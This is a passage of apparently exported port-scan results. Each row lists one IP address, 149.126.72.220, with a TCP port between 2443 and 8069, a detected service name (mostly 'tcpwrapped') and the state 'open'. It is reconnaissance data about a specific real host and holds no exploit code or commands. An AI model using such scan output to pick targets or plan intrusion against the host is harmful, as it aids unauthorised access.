5674149.126.72.220 2443 tcp tcpwrapped open
5675149.126.72.220 2453 tcp tcpwrapped open
5676149.126.72.220 2480 tcp tcpwrapped open
5677149.126.72.220 2548 tcp tcpwrapped open
5678149.126.72.220 2549 tcp tcpwrapped open
5679149.126.72.220 2550 tcp tcpwrapped open
5680149.126.72.220 2551 tcp tcpwrapped open
5681149.126.72.220 2552 tcp tcpwrapped open
5682149.126.72.220 2553 tcp tcpwrapped open
5683149.126.72.220 2554 tcp tcpwrapped open
5684149.126.72.220 2555 tcp tcpwrapped open
5685149.126.72.220 2556 tcp tcpwrapped open
5686149.126.72.220 2557 tcp tcpwrapped open
5687149.126.72.220 2558 tcp tcpwrapped open
5688149.126.72.220 2559 tcp tcpwrapped open
5689149.126.72.220 2560 tcp tcpwrapped open
5690149.126.72.220 2561 tcp tcpwrapped open
5691149.126.72.220 2562 tcp tcpwrapped open
5692149.126.72.220 2563 tcp tcpwrapped open
5693149.126.72.220 2566 tcp tcpwrapped open
5694149.126.72.220 2567 tcp tcpwrapped open
5695149.126.72.220 2568 tcp tcpwrapped open
5696149.126.72.220 2569 tcp tcpwrapped open
5697149.126.72.220 2570 tcp tcpwrapped open
5698149.126.72.220 2572 tcp tcpwrapped open
5699149.126.72.220 2598 tcp tcpwrapped open
5700149.126.72.220 2599 tcp tcpwrapped open
5701149.126.72.220 2850 tcp tcpwrapped open
5702149.126.72.220 2985 tcp tcpwrapped open
5703149.126.72.220 2995 tcp tcpwrapped open
5704149.126.72.220 3000 tcp tcpwrapped open
5705149.126.72.220 3001 tcp tcpwrapped open
5706149.126.72.220 3002 tcp tcpwrapped open
5707149.126.72.220 3003 tcp tcpwrapped open
5708149.126.72.220 3004 tcp tcpwrapped open
5709149.126.72.220 3005 tcp tcpwrapped open
5710149.126.72.220 3006 tcp tcpwrapped open
5711149.126.72.220 3007 tcp tcpwrapped open
5712149.126.72.220 3008 tcp tcpwrapped open
5713149.126.72.220 3009 tcp tcpwrapped open
5714149.126.72.220 3010 tcp tcpwrapped open
5715149.126.72.220 3011 tcp tcpwrapped open
5716149.126.72.220 3012 tcp tcpwrapped open
5717149.126.72.220 3013 tcp tcpwrapped open
5718149.126.72.220 3014 tcp tcpwrapped open
5719149.126.72.220 3015 tcp tcpwrapped open
5720149.126.72.220 3016 tcp tcpwrapped open
5721149.126.72.220 3017 tcp tcpwrapped open
5722149.126.72.220 3018 tcp tcpwrapped open
5723149.126.72.220 3019 tcp tcpwrapped open
5724149.126.72.220 3020 tcp tcpwrapped open
5725149.126.72.220 3021 tcp tcpwrapped open
5726149.126.72.220 3022 tcp tcpwrapped open
5727149.126.72.220 3030 tcp tcpwrapped open
5728149.126.72.220 3047 tcp tcpwrapped open
5729149.126.72.220 3048 tcp tcpwrapped open
5730149.126.72.220 3049 tcp tcpwrapped open
5731149.126.72.220 3050 tcp tcpwrapped open
5732149.126.72.220 3051 tcp tcpwrapped open
5733149.126.72.220 3052 tcp tcpwrapped open
5734149.126.72.220 3053 tcp tcpwrapped open
5735149.126.72.220 3054 tcp tcpwrapped open
5736149.126.72.220 3055 tcp tcpwrapped open
5737149.126.72.220 3056 tcp tcpwrapped open
5738149.126.72.220 3057 tcp tcpwrapped open
5739149.126.72.220 3058 tcp tcpwrapped open
5740149.126.72.220 3059 tcp tcpwrapped open
5741149.126.72.220 3060 tcp tcpwrapped open
5742149.126.72.220 3061 tcp tcpwrapped open
5743149.126.72.220 3062 tcp tcpwrapped open
5744149.126.72.220 3063 tcp tcpwrapped open
5745149.126.72.220 3064 tcp tcpwrapped open
5746149.126.72.220 3065 tcp tcpwrapped open
5747149.126.72.220 3066 tcp tcpwrapped open
5748149.126.72.220 3067 tcp tcpwrapped open
5749149.126.72.220 3068 tcp tcpwrapped open
5750149.126.72.220 3069 tcp tcpwrapped open
5751149.126.72.220 3070 tcp tcpwrapped open
5752149.126.72.220 3071 tcp tcpwrapped open
5753149.126.72.220 3072 tcp tcpwrapped open
5754149.126.72.220 3073 tcp tcpwrapped open
5755149.126.72.220 3074 tcp tcpwrapped open
5756149.126.72.220 3075 tcp tcpwrapped open
5757149.126.72.220 3076 tcp tcpwrapped open
5758149.126.72.220 3077 tcp tcpwrapped open
5759149.126.72.220 3078 tcp tcpwrapped open
5760149.126.72.220 3079 tcp tcpwrapped open
5761149.126.72.220 3080 tcp tcpwrapped open
5762149.126.72.220 3081 tcp tcpwrapped open
5763149.126.72.220 3082 tcp tcpwrapped open
5764149.126.72.220 3083 tcp tcpwrapped open
5765149.126.72.220 3084 tcp tcpwrapped open
5766149.126.72.220 3085 tcp tcpwrapped open
5767149.126.72.220 3086 tcp tcpwrapped open
5768149.126.72.220 3087 tcp tcpwrapped open
5769149.126.72.220 3088 tcp tcpwrapped open
5770149.126.72.220 3089 tcp tcpwrapped open
5771149.126.72.220 3090 tcp tcpwrapped open
5772149.126.72.220 3091 tcp tcpwrapped open
5773149.126.72.220 3092 tcp tcpwrapped open
5774149.126.72.220 3093 tcp tcpwrapped open
5775149.126.72.220 3094 tcp tcpwrapped open
5776149.126.72.220 3095 tcp tcpwrapped open
5777149.126.72.220 3096 tcp tcpwrapped open
5778149.126.72.220 3097 tcp tcpwrapped open
5779149.126.72.220 3098 tcp tcpwrapped open
5780149.126.72.220 3099 tcp tcpwrapped open
5781149.126.72.220 3100 tcp tcpwrapped open
5782149.126.72.220 3101 tcp tcpwrapped open
5783149.126.72.220 3102 tcp tcpwrapped open
5784149.126.72.220 3103 tcp tcpwrapped open
5785149.126.72.220 3104 tcp tcpwrapped open
5786149.126.72.220 3105 tcp tcpwrapped open
5787149.126.72.220 3106 tcp tcpwrapped open
5788149.126.72.220 3107 tcp tcpwrapped open
5789149.126.72.220 3108 tcp tcpwrapped open
5790149.126.72.220 3109 tcp tcpwrapped open
5791149.126.72.220 3110 tcp tcpwrapped open
5792149.126.72.220 3111 tcp tcpwrapped open
5793149.126.72.220 3112 tcp tcpwrapped open
5794149.126.72.220 3113 tcp tcpwrapped open
5795149.126.72.220 3114 tcp tcpwrapped open
5796149.126.72.220 3115 tcp tcpwrapped open
5797149.126.72.220 3116 tcp tcpwrapped open
5798149.126.72.220 3117 tcp tcpwrapped open
5799149.126.72.220 3118 tcp tcpwrapped open
5800149.126.72.220 3119 tcp tcpwrapped open
5801149.126.72.220 3120 tcp tcpwrapped open
5802149.126.72.220 3121 tcp tcpwrapped open
5803149.126.72.220 3150 tcp tcpwrapped open
5804149.126.72.220 3155 tcp tcpwrapped open
5805149.126.72.220 3160 tcp tcpwrapped open
5806149.126.72.220 3165 tcp tcpwrapped open
5807149.126.72.220 3270 tcp tcpwrapped open
5808149.126.72.220 3299 tcp tcpwrapped open
5809149.126.72.220 3306 tcp tcpwrapped open
5810149.126.72.220 3333 tcp tcpwrapped open
5811149.126.72.220 3389 tcp tcpwrapped open
5812149.126.72.220 3391 tcp tcpwrapped open
5813149.126.72.220 3400 tcp tcpwrapped open
5814149.126.72.220 3401 tcp tcpwrapped open
5815149.126.72.220 3402 tcp tcpwrapped open
5816149.126.72.220 3403 tcp tcpwrapped open
5817149.126.72.220 3404 tcp tcpwrapped open
5818149.126.72.220 3405 tcp tcpwrapped open
5819149.126.72.220 3406 tcp tcpwrapped open
5820149.126.72.220 3407 tcp tcpwrapped open
5821149.126.72.220 3408 tcp tcpwrapped open
5822149.126.72.220 3409 tcp tcpwrapped open
5823149.126.72.220 3410 tcp tcpwrapped open
5824149.126.72.220 3412 tcp tcpwrapped open
5825149.126.72.220 3443 tcp tcpwrapped open
5826149.126.72.220 3500 tcp tcpwrapped open
5827149.126.72.220 3510 tcp tcpwrapped open
5828149.126.72.220 3521 tcp tcpwrapped open
5829149.126.72.220 3522 tcp tcpwrapped open
5830149.126.72.220 3523 tcp tcpwrapped open
5831149.126.72.220 3524 tcp tcpwrapped open
5832149.126.72.220 3530 tcp tcpwrapped open
5833149.126.72.220 3531 tcp tcpwrapped open
5834149.126.72.220 3540 tcp tcpwrapped open
5835149.126.72.220 3548 tcp tcpwrapped open
5836149.126.72.220 3549 tcp tcpwrapped open
5837149.126.72.220 3550 tcp tcpwrapped open
5838149.126.72.220 3551 tcp tcpwrapped open
5839149.126.72.220 3552 tcp tcpwrapped open
5840149.126.72.220 3553 tcp tcpwrapped open
5841149.126.72.220 3554 tcp tcpwrapped open
5842149.126.72.220 3555 tcp tcpwrapped open
5843149.126.72.220 3556 tcp tcpwrapped open
5844149.126.72.220 3557 tcp tcpwrapped open
5845149.126.72.220 3558 tcp tcpwrapped open
5846149.126.72.220 3559 tcp tcpwrapped open
5847149.126.72.220 3560 tcp tcpwrapped open
5848149.126.72.220 3561 tcp tcpwrapped open
5849149.126.72.220 3562 tcp tcpwrapped open
5850149.126.72.220 3563 tcp tcpwrapped open
5851149.126.72.220 3566 tcp tcpwrapped open
5852149.126.72.220 3567 tcp tcpwrapped open
5853149.126.72.220 3568 tcp tcpwrapped open
5854149.126.72.220 3569 tcp tcpwrapped open
5855149.126.72.220 3570 tcp tcpwrapped open
5856149.126.72.220 3572 tcp tcpwrapped open
5857149.126.72.220 3580 tcp tcpwrapped open
5858149.126.72.220 3590 tcp tcpwrapped open
5859149.126.72.220 3790 tcp tcpwrapped open
5860149.126.72.220 3791 tcp tcpwrapped open
5861149.126.72.220 3792 tcp tcpwrapped open
5862149.126.72.220 3793 tcp tcpwrapped open
5863149.126.72.220 3794 tcp tcpwrapped open
5864149.126.72.220 3838 tcp tcpwrapped open
5865149.126.72.220 3841 tcp tcpwrapped open
5866149.126.72.220 3842 tcp tcpwrapped open
5867149.126.72.220 3950 tcp tcpwrapped open
5868149.126.72.220 3951 tcp tcpwrapped open
5869149.126.72.220 3952 tcp tcpwrapped open
5870149.126.72.220 3953 tcp tcpwrapped open
5871149.126.72.220 3954 tcp adrep open
5872149.126.72.220 4000 tcp tcpwrapped open
5873149.126.72.220 4001 tcp newoak open
5874149.126.72.220 4002 tcp mlchat-proxy open
5875149.126.72.220 4021 tcp nexus-portal open
5876149.126.72.220 4022 tcp dnox open
5877149.126.72.220 4023 tcp esnm-zoning open
5878149.126.72.220 4043 tcp nirp open
5879149.126.72.220 4072 tcp zieto-sock open
5880149.126.72.220 4080 tcp lorica-in open
5881149.126.72.220 4085 tcp ezmessagesrv open
5882149.126.72.220 4120 tcp minirem open
5883149.126.72.220 4147 tcp vrxpservman open
5884149.126.72.220 4148 tcp hhb-handheld open
5885149.126.72.220 4150 tcp poweralert-nsa open
5886149.126.72.220 4155 tcp bzr open
5887149.126.72.220 4160 tcp jini-discovery open
5888149.126.72.220 4165 tcp altcp open
5889149.126.72.220 4172 tcp pcoip open
5890149.126.72.220 4243 tcp vrml-multi-use open
5891149.126.72.220 4244 tcp vrml-multi-use open
5892149.126.72.220 4250 tcp vrml-multi-use open
5893149.126.72.220 4300 tcp corelccam open
5894149.126.72.220 4333 tcp msql open
5895149.126.72.220 4343 tcp unicall open
5896149.126.72.220 4344 tcp vinainstall open
5897149.126.72.220 4400 tcp ds-srv open
5898149.126.72.220 4401 tcp tcpwrapped open
5899149.126.72.220 4402 tcp tcpwrapped open
5900149.126.72.220 4430 tcp tcpwrapped open
5901149.126.72.220 4431 tcp tcpwrapped open
5902149.126.72.220 4432 tcp tcpwrapped open
5903149.126.72.220 4434 tcp tcpwrapped open
5904149.126.72.220 4435 tcp tcpwrapped open
5905149.126.72.220 4436 tcp tcpwrapped open
5906149.126.72.220 4437 tcp tcpwrapped open
5907149.126.72.220 4439 tcp tcpwrapped open
5908149.126.72.220 4440 tcp tcpwrapped open
5909149.126.72.220 4443 tcp tcpwrapped open
5910149.126.72.220 4444 tcp tcpwrapped open
5911149.126.72.220 4445 tcp tcpwrapped open
5912149.126.72.220 4451 tcp tcpwrapped open
5913149.126.72.220 4455 tcp tcpwrapped open
5914149.126.72.220 4457 tcp tcpwrapped open
5915149.126.72.220 4459 tcp tcpwrapped open
5916149.126.72.220 4461 tcp tcpwrapped open
5917149.126.72.220 4463 tcp tcpwrapped open
5918149.126.72.220 4477 tcp tcpwrapped open
5919149.126.72.220 4482 tcp tcpwrapped open
5920149.126.72.220 4500 tcp tcpwrapped open
5921149.126.72.220 4502 tcp tcpwrapped open
5922149.126.72.220 4505 tcp tcpwrapped open
5923149.126.72.220 4572 tcp tcpwrapped open
5924149.126.72.220 4602 tcp tcpwrapped open
5925149.126.72.220 4620 tcp tcpwrapped open
5926149.126.72.220 4643 tcp tcpwrapped open
5927149.126.72.220 4848 tcp tcpwrapped open
5928149.126.72.220 4933 tcp tcpwrapped open
5929149.126.72.220 4993 tcp tcpwrapped open
5930149.126.72.220 5000 tcp tcpwrapped open
5931149.126.72.220 5001 tcp tcpwrapped open
5932149.126.72.220 5002 tcp tcpwrapped open
5933149.126.72.220 5003 tcp tcpwrapped open
5934149.126.72.220 5004 tcp tcpwrapped open
5935149.126.72.220 5005 tcp tcpwrapped open
5936149.126.72.220 5006 tcp tcpwrapped open
5937149.126.72.220 5007 tcp tcpwrapped open
5938149.126.72.220 5008 tcp tcpwrapped open
5939149.126.72.220 5009 tcp tcpwrapped open
5940149.126.72.220 5010 tcp tcpwrapped open
5941149.126.72.220 5011 tcp tcpwrapped open
5942149.126.72.220 5022 tcp tcpwrapped open
5943149.126.72.220 5050 tcp tcpwrapped open
5944149.126.72.220 5053 tcp tcpwrapped open
5945149.126.72.220 5060 tcp tcpwrapped open
5946149.126.72.220 5061 tcp tcpwrapped open
5947149.126.72.220 5080 tcp tcpwrapped open
5948149.126.72.220 5083 tcp tcpwrapped open
5949149.126.72.220 5089 tcp tcpwrapped open
5950149.126.72.220 5090 tcp tcpwrapped open
5951149.126.72.220 5100 tcp tcpwrapped open
5952149.126.72.220 5105 tcp tcpwrapped open
5953149.126.72.220 5119 tcp tcpwrapped open
5954149.126.72.220 5120 tcp tcpwrapped open
5955149.126.72.220 5130 tcp tcpwrapped open
5956149.126.72.220 5140 tcp tcpwrapped open
5957149.126.72.220 5150 tcp tcpwrapped open
5958149.126.72.220 5160 tcp tcpwrapped open
5959149.126.72.220 5180 tcp tcpwrapped open
5960149.126.72.220 5201 tcp tcpwrapped open
5961149.126.72.220 5222 tcp tcpwrapped open
5962149.126.72.220 5223 tcp tcpwrapped open
5963149.126.72.220 5224 tcp tcpwrapped open
5964149.126.72.220 5225 tcp tcpwrapped open
5965149.126.72.220 5226 tcp tcpwrapped open
5966149.126.72.220 5227 tcp tcpwrapped open
5967149.126.72.220 5228 tcp tcpwrapped open
5968149.126.72.220 5229 tcp tcpwrapped open
5969149.126.72.220 5230 tcp tcpwrapped open
5970149.126.72.220 5231 tcp tcpwrapped open
5971149.126.72.220 5232 tcp tcpwrapped open
5972149.126.72.220 5233 tcp tcpwrapped open
5973149.126.72.220 5234 tcp tcpwrapped open
5974149.126.72.220 5235 tcp tcpwrapped open
5975149.126.72.220 5236 tcp tcpwrapped open
5976149.126.72.220 5237 tcp tcpwrapped open
5977149.126.72.220 5238 tcp tcpwrapped open
5978149.126.72.220 5239 tcp tcpwrapped open
5979149.126.72.220 5240 tcp tcpwrapped open
5980149.126.72.220 5241 tcp tcpwrapped open
5981149.126.72.220 5242 tcp tcpwrapped open
5982149.126.72.220 5243 tcp tcpwrapped open
5983149.126.72.220 5244 tcp tcpwrapped open
5984149.126.72.220 5245 tcp tcpwrapped open
5985149.126.72.220 5246 tcp tcpwrapped open
5986149.126.72.220 5247 tcp tcpwrapped open
5987149.126.72.220 5248 tcp tcpwrapped open
5988149.126.72.220 5249 tcp tcpwrapped open
5989149.126.72.220 5250 tcp tcpwrapped open
5990149.126.72.220 5251 tcp tcpwrapped open
5991149.126.72.220 5252 tcp tcpwrapped open
5992149.126.72.220 5253 tcp tcpwrapped open
5993149.126.72.220 5254 tcp tcpwrapped open
5994149.126.72.220 5255 tcp tcpwrapped open
5995149.126.72.220 5256 tcp tcpwrapped open
5996149.126.72.220 5257 tcp tcpwrapped open
5997149.126.72.220 5258 tcp tcpwrapped open
5998149.126.72.220 5259 tcp tcpwrapped open
5999149.126.72.220 5260 tcp tcpwrapped open
6000149.126.72.220 5261 tcp tcpwrapped open
6001149.126.72.220 5262 tcp tcpwrapped open
6002149.126.72.220 5263 tcp tcpwrapped open
6003149.126.72.220 5264 tcp tcpwrapped open
6004149.126.72.220 5265 tcp tcpwrapped open
6005149.126.72.220 5266 tcp tcpwrapped open
6006149.126.72.220 5267 tcp tcpwrapped open
6007149.126.72.220 5268 tcp tcpwrapped open
6008149.126.72.220 5269 tcp tcpwrapped open
6009149.126.72.220 5270 tcp tcpwrapped open
6010149.126.72.220 5271 tcp tcpwrapped open
6011149.126.72.220 5272 tcp tcpwrapped open
6012149.126.72.220 5273 tcp tcpwrapped open
6013149.126.72.220 5274 tcp tcpwrapped open
6014149.126.72.220 5275 tcp tcpwrapped open
6015149.126.72.220 5276 tcp tcpwrapped open
6016149.126.72.220 5277 tcp tcpwrapped open
6017149.126.72.220 5278 tcp tcpwrapped open
6018149.126.72.220 5279 tcp tcpwrapped open
6019149.126.72.220 5280 tcp tcpwrapped open
6020149.126.72.220 5440 tcp tcpwrapped open
6021149.126.72.220 5443 tcp tcpwrapped open
6022149.126.72.220 5456 tcp tcpwrapped open
6023149.126.72.220 5494 tcp tcpwrapped open
6024149.126.72.220 5495 tcp tcpwrapped open
6025149.126.72.220 5500 tcp tcpwrapped open
6026149.126.72.220 5503 tcp tcpwrapped open
6027149.126.72.220 5552 tcp tcpwrapped open
6028149.126.72.220 5555 tcp tcpwrapped open
6029149.126.72.220 5556 tcp tcpwrapped open
6030149.126.72.220 5557 tcp tcpwrapped open
6031149.126.72.220 5567 tcp tcpwrapped open
6032149.126.72.220 5568 tcp tcpwrapped open
6033149.126.72.220 5569 tcp tcpwrapped open
6034149.126.72.220 5590 tcp tcpwrapped open
6035149.126.72.220 5591 tcp tcpwrapped open
6036149.126.72.220 5592 tcp tcpwrapped open
6037149.126.72.220 5593 tcp tcpwrapped open
6038149.126.72.220 5594 tcp tcpwrapped open
6039149.126.72.220 5595 tcp tcpwrapped open
6040149.126.72.220 5596 tcp tcpwrapped open
6041149.126.72.220 5597 tcp tcpwrapped open
6042149.126.72.220 5598 tcp tcpwrapped open
6043149.126.72.220 5599 tcp tcpwrapped open
6044149.126.72.220 5600 tcp tcpwrapped open
6045149.126.72.220 5601 tcp tcpwrapped open
6046149.126.72.220 5602 tcp tcpwrapped open
6047149.126.72.220 5603 tcp tcpwrapped open
6048149.126.72.220 5604 tcp tcpwrapped open
6049149.126.72.220 5605 tcp tcpwrapped open
6050149.126.72.220 5606 tcp tcpwrapped open
6051149.126.72.220 5607 tcp tcpwrapped open
6052149.126.72.220 5608 tcp tcpwrapped open
6053149.126.72.220 5609 tcp tcpwrapped open
6054149.126.72.220 5613 tcp tcpwrapped open
6055149.126.72.220 5614 tcp tcpwrapped open
6056149.126.72.220 5620 tcp tcpwrapped open
6057149.126.72.220 5630 tcp tcpwrapped open
6058149.126.72.220 5640 tcp tcpwrapped open
6059149.126.72.220 5650 tcp tcpwrapped open
6060149.126.72.220 5660 tcp tcpwrapped open
6061149.126.72.220 5671 tcp tcpwrapped open
6062149.126.72.220 5672 tcp tcpwrapped open
6063149.126.72.220 5673 tcp tcpwrapped open
6064149.126.72.220 5680 tcp tcpwrapped open
6065149.126.72.220 5696 tcp tcpwrapped open
6066149.126.72.220 5698 tcp tcpwrapped open
6067149.126.72.220 5701 tcp tcpwrapped open
6068149.126.72.220 5721 tcp tcpwrapped open
6069149.126.72.220 5900 tcp tcpwrapped open
6070149.126.72.220 5901 tcp tcpwrapped open
6071149.126.72.220 5902 tcp tcpwrapped open
6072149.126.72.220 5903 tcp tcpwrapped open
6073149.126.72.220 5904 tcp tcpwrapped open
6074149.126.72.220 5905 tcp tcpwrapped open
6075149.126.72.220 5906 tcp tcpwrapped open
6076149.126.72.220 5907 tcp tcpwrapped open
6077149.126.72.220 5908 tcp tcpwrapped open
6078149.126.72.220 5909 tcp tcpwrapped open
6079149.126.72.220 5910 tcp tcpwrapped open
6080149.126.72.220 5911 tcp tcpwrapped open
6081149.126.72.220 5912 tcp tcpwrapped open
6082149.126.72.220 5913 tcp tcpwrapped open
6083149.126.72.220 5914 tcp tcpwrapped open
6084149.126.72.220 5915 tcp tcpwrapped open
6085149.126.72.220 5916 tcp tcpwrapped open
6086149.126.72.220 5917 tcp tcpwrapped open
6087149.126.72.220 5918 tcp tcpwrapped open
6088149.126.72.220 5919 tcp tcpwrapped open
6089149.126.72.220 5920 tcp tcpwrapped open
6090149.126.72.220 5984 tcp tcpwrapped open
6091149.126.72.220 5985 tcp tcpwrapped open
6092149.126.72.220 5986 tcp tcpwrapped open
6093149.126.72.220 5987 tcp tcpwrapped open
6094149.126.72.220 5988 tcp tcpwrapped open
6095149.126.72.220 5989 tcp tcpwrapped open
6096149.126.72.220 5990 tcp tcpwrapped open
6097149.126.72.220 5991 tcp tcpwrapped open
6098149.126.72.220 5992 tcp tcpwrapped open
6099149.126.72.220 5993 tcp tcpwrapped open
6100149.126.72.220 5994 tcp tcpwrapped open
6101149.126.72.220 5995 tcp tcpwrapped open
6102149.126.72.220 5996 tcp tcpwrapped open
6103149.126.72.220 5997 tcp tcpwrapped open
6104149.126.72.220 5998 tcp tcpwrapped open
6105149.126.72.220 5999 tcp tcpwrapped open
6106149.126.72.220 6000 tcp tcpwrapped open
6107149.126.72.220 6001 tcp tcpwrapped open
6108149.126.72.220 6002 tcp tcpwrapped open
6109149.126.72.220 6003 tcp tcpwrapped open
6110149.126.72.220 6004 tcp tcpwrapped open
6111149.126.72.220 6005 tcp tcpwrapped open
6112149.126.72.220 6006 tcp tcpwrapped open
6113149.126.72.220 6007 tcp tcpwrapped open
6114149.126.72.220 6008 tcp tcpwrapped open
6115149.126.72.220 6009 tcp tcpwrapped open
6116149.126.72.220 6010 tcp tcpwrapped open
6117149.126.72.220 6011 tcp tcpwrapped open
6118149.126.72.220 6021 tcp tcpwrapped open
6119149.126.72.220 6060 tcp tcpwrapped open
6120149.126.72.220 6061 tcp tcpwrapped open
6121149.126.72.220 6081 tcp tcpwrapped open
6122149.126.72.220 6100 tcp tcpwrapped open
6123149.126.72.220 6102 tcp tcpwrapped open
6124149.126.72.220 6134 tcp tcpwrapped open
6125149.126.72.220 6161 tcp tcpwrapped open
6126149.126.72.220 6331 tcp tcpwrapped open
6127149.126.72.220 6348 tcp tcpwrapped open
6128149.126.72.220 6379 tcp tcpwrapped open
6129149.126.72.220 6380 tcp tcpwrapped open
6130149.126.72.220 6433 tcp tcpwrapped open
6131149.126.72.220 6440 tcp tcpwrapped open
6132149.126.72.220 6443 tcp tcpwrapped open
6133149.126.72.220 6488 tcp tcpwrapped open
6134149.126.72.220 6500 tcp tcpwrapped open
6135149.126.72.220 6505 tcp tcpwrapped open
6136149.126.72.220 6510 tcp tcpwrapped open
6137149.126.72.220 6511 tcp tcpwrapped open
6138149.126.72.220 6512 tcp tcpwrapped open
6139149.126.72.220 6514 tcp tcpwrapped open
6140149.126.72.220 6543 tcp tcpwrapped open
6141149.126.72.220 6544 tcp tcpwrapped open
6142149.126.72.220 6560 tcp tcpwrapped open
6143149.126.72.220 6561 tcp tcpwrapped open
6144149.126.72.220 6565 tcp tcpwrapped open
6145149.126.72.220 6580 tcp tcpwrapped open
6146149.126.72.220 6581 tcp tcpwrapped open
6147149.126.72.220 6590 tcp tcpwrapped open
6148149.126.72.220 6601 tcp tcpwrapped open
6149149.126.72.220 6603 tcp tcpwrapped open
6150149.126.72.220 6605 tcp tcpwrapped open
6151149.126.72.220 6661 tcp tcpwrapped open
6152149.126.72.220 6662 tcp tcpwrapped open
6153149.126.72.220 6666 tcp tcpwrapped open
6154149.126.72.220 6686 tcp tcpwrapped open
6155149.126.72.220 6688 tcp tcpwrapped open
6156149.126.72.220 6700 tcp tcpwrapped open
6157149.126.72.220 6755 tcp tcpwrapped open
6158149.126.72.220 6775 tcp tcpwrapped open
6159149.126.72.220 6779 tcp tcpwrapped open
6160149.126.72.220 6789 tcp tcpwrapped open
6161149.126.72.220 6799 tcp tcpwrapped open
6162149.126.72.220 7000 tcp tcpwrapped open
6163149.126.72.220 7001 tcp tcpwrapped open
6164149.126.72.220 7002 tcp tcpwrapped open
6165149.126.72.220 7003 tcp tcpwrapped open
6166149.126.72.220 7004 tcp tcpwrapped open
6167149.126.72.220 7005 tcp tcpwrapped open
6168149.126.72.220 7007 tcp tcpwrapped open
6169149.126.72.220 7010 tcp tcpwrapped open
6170149.126.72.220 7011 tcp tcpwrapped open
6171149.126.72.220 7021 tcp tcpwrapped open
6172149.126.72.220 7070 tcp tcpwrapped open
6173149.126.72.220 7071 tcp tcpwrapped open
6174149.126.72.220 7079 tcp tcpwrapped open
6175149.126.72.220 7080 tcp tcpwrapped open
6176149.126.72.220 7081 tcp tcpwrapped open
6177149.126.72.220 7082 tcp tcpwrapped open
6178149.126.72.220 7083 tcp tcpwrapped open
6179149.126.72.220 7084 tcp tcpwrapped open
6180149.126.72.220 7085 tcp tcpwrapped open
6181149.126.72.220 7086 tcp tcpwrapped open
6182149.126.72.220 7087 tcp tcpwrapped open
6183149.126.72.220 7088 tcp tcpwrapped open
6184149.126.72.220 7090 tcp tcpwrapped open
6185149.126.72.220 7171 tcp tcpwrapped open
6186149.126.72.220 7172 tcp tcpwrapped open
6187149.126.72.220 7272 tcp tcpwrapped open
6188149.126.72.220 7348 tcp tcpwrapped open
6189149.126.72.220 7403 tcp tcpwrapped open
6190149.126.72.220 7433 tcp tcpwrapped open
6191149.126.72.220 7441 tcp tcpwrapped open
6192149.126.72.220 7443 tcp tcpwrapped open
6193149.126.72.220 7444 tcp tcpwrapped open
6194149.126.72.220 7445 tcp tcpwrapped open
6195149.126.72.220 7473 tcp tcpwrapped open
6196149.126.72.220 7500 tcp tcpwrapped open
6197149.126.72.220 7537 tcp tcpwrapped open
6198149.126.72.220 7687 tcp tcpwrapped open
6199149.126.72.220 7700 tcp tcpwrapped open
6200149.126.72.220 7771 tcp tcpwrapped open
6201149.126.72.220 7773 tcp tcpwrapped open
6202149.126.72.220 7774 tcp tcpwrapped open
6203149.126.72.220 7775 tcp tcpwrapped open
6204149.126.72.220 7776 tcp tcpwrapped open
6205149.126.72.220 7777 tcp tcpwrapped open
6206149.126.72.220 7778 tcp tcpwrapped open
6207149.126.72.220 7779 tcp tcpwrapped open
6208149.126.72.220 7788 tcp tcpwrapped open
6209149.126.72.220 7799 tcp tcpwrapped open
6210149.126.72.220 7998 tcp tcpwrapped open
6211149.126.72.220 7999 tcp tcpwrapped open
6212149.126.72.220 8000 tcp tcpwrapped open
6213149.126.72.220 8001 tcp tcpwrapped open
6214149.126.72.220 8002 tcp tcpwrapped open
6215149.126.72.220 8003 tcp tcpwrapped open
6216149.126.72.220 8004 tcp tcpwrapped open
6217149.126.72.220 8005 tcp tcpwrapped open
6218149.126.72.220 8006 tcp tcpwrapped open
6219149.126.72.220 8007 tcp tcpwrapped open
6220149.126.72.220 8008 tcp tcpwrapped open
6221149.126.72.220 8009 tcp tcpwrapped open
6222149.126.72.220 8010 tcp tcpwrapped open
6223149.126.72.220 8011 tcp tcpwrapped open
6224149.126.72.220 8012 tcp tcpwrapped open
6225149.126.72.220 8013 tcp tcpwrapped open
6226149.126.72.220 8014 tcp tcpwrapped open
6227149.126.72.220 8015 tcp tcpwrapped open
6228149.126.72.220 8016 tcp tcpwrapped open
6229149.126.72.220 8017 tcp tcpwrapped open
6230149.126.72.220 8018 tcp tcpwrapped open
6231149.126.72.220 8019 tcp tcpwrapped open
6232149.126.72.220 8020 tcp tcpwrapped open
6233149.126.72.220 8021 tcp tcpwrapped open
6234149.126.72.220 8022 tcp tcpwrapped open
6235149.126.72.220 8023 tcp tcpwrapped open
6236149.126.72.220 8024 tcp tcpwrapped open
6237149.126.72.220 8025 tcp tcpwrapped open
6238149.126.72.220 8026 tcp tcpwrapped open
6239149.126.72.220 8027 tcp tcpwrapped open
6240149.126.72.220 8028 tcp tcpwrapped open
6241149.126.72.220 8029 tcp tcpwrapped open
6242149.126.72.220 8030 tcp tcpwrapped open
6243149.126.72.220 8031 tcp tcpwrapped open
6244149.126.72.220 8032 tcp tcpwrapped open
6245149.126.72.220 8033 tcp tcpwrapped open
6246149.126.72.220 8034 tcp tcpwrapped open
6247149.126.72.220 8035 tcp tcpwrapped open
6248149.126.72.220 8036 tcp tcpwrapped open
6249149.126.72.220 8037 tcp tcpwrapped open
6250149.126.72.220 8038 tcp tcpwrapped open
6251149.126.72.220 8039 tcp tcpwrapped open
6252149.126.72.220 8040 tcp tcpwrapped open
6253149.126.72.220 8041 tcp tcpwrapped open
6254149.126.72.220 8042 tcp tcpwrapped open
6255149.126.72.220 8043 tcp tcpwrapped open
6256149.126.72.220 8044 tcp tcpwrapped open
6257149.126.72.220 8045 tcp tcpwrapped open
6258149.126.72.220 8046 tcp tcpwrapped open
6259149.126.72.220 8047 tcp tcpwrapped open
6260149.126.72.220 8048 tcp tcpwrapped open
6261149.126.72.220 8049 tcp tcpwrapped open
6262149.126.72.220 8050 tcp tcpwrapped open
6263149.126.72.220 8051 tcp tcpwrapped open
6264149.126.72.220 8052 tcp tcpwrapped open
6265149.126.72.220 8053 tcp tcpwrapped open
6266149.126.72.220 8054 tcp tcpwrapped open
6267149.126.72.220 8055 tcp tcpwrapped open
6268149.126.72.220 8056 tcp tcpwrapped open
6269149.126.72.220 8057 tcp tcpwrapped open
6270149.126.72.220 8058 tcp tcpwrapped open
6271149.126.72.220 8060 tcp tcpwrapped open
6272149.126.72.220 8064 tcp tcpwrapped open
6273149.126.72.220 8065 tcp tcpwrapped open
6274149.126.72.220 8069 tcp tcpwrapped open
